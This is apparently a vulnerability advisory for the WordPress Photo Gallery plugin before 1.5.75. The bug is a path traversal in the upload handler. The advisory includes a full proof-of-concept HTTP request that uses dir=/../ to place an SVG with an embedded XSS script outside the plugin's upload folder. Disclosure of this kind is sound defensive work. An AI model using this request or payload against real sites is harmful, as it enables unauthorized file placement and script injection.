Photo Gallery < 1.5.75 - File Upload Path Traversal
Description
The plugin did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images/SVG anywhere in the filesystem via a path traversal vector
Proof of Concept
The below requests will put the xss.svg file into the /wp-content/uploads/ folder rather than /wp-content/uploads/photo-gallery/ POST /wp-admin/admin-ajax.php?bwg_nonce=4ef81877b0&action=bwg_UploadHandler&dir=/../ HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------61502566032120876251044562165 Content-Length: 1841 Connection: close Cookie: [high privilege user, such as admin] -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="bwg_nonce" d0b8d99404 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="upload_thumb_width" 500 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="upload_thumb_height" 500 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="upload_img_width" 1200 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="upload_img_height" 1200 -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="extensions" jpg,jpeg,png,gif,svg -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="callback" bwg_add_image -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="sort_by" date_modified -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="sort_order" desc -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="items_view" thumbs -----------------------------61502566032120876251044562165 Content-Disposition: form-data; name="files[]"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript">alert(document.domain);</script> </svg> -----------------------------61502566032120876251044562165--
Affects Plugins
Fixed in version 1.5.75✓
References
Classification
Miscellaneous
Timeline
Publicly Published
2021-07-18 (about 3 months ago)
Added
2021-07-19 (about 3 months ago)
Last Updated
2021-07-19 (about 3 months ago)